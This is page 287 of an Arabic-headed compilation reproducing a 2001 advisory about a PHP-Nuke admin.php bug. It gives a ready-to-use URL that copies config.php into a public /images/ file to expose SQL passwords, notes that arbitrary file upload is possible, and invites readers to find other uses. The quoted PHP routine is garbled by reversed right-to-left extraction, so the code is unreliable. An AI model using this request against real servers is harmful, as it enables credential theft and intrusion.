Page 287 - بسم الله الرحمن الرحيم
P. 287
" " ثغرة نيوك
<>منقول
>Arab VireruZ :>الكاتب
: الشر ح بالنقليزية
twlc: here your 0day from LucisFero and supergate
Posted on Monday, September 24 @ 14:25:58 CDT
topic: advisories
twlc security divison
24/09/2001
.Php nuke BUGGED
:Found by
LucisFero and supergate
twlc/.
Summary
This time the bug is really dangerous...it allows you to 'cp' any file on
...the box... or even upload files
Systems Affected
all the versions ARE vulnerable
except '5.0 RC1' (i wonder why a released c. is ok while the final 5.2 is
(bugged
Explanation
?Do you need sql password
http://www.server.net/admin.php?
upload=1&file=config.php&file_name=hacked.txt&wdir=/images/&userfil
e=config.php&userfile_name=hacked.txt
the admin 'login' page will be prompted just go to
http://www.server.net/images/hacked.txt and you will see config.php that
as everyone knows contain the sql's passwords, you can even upload
files...i leave you the 'fun' to find all the ways to use it... and try to dont
be a SCRIPT KIDDIE we wrote this advisory to help who runs php nuke
.and NOT TO LET YOU HAVE FUN
:let me explain you the bug... admin.php contains this routine
;(basedir = dirname($SCRIPT_FILENAME$
;textrows = 20$
;textcols = 85$
;(udir = dirname($PHP_SELF$
;"/"=if(!$wdir) $wdir
;"if($cancel) $op="FileManager
287
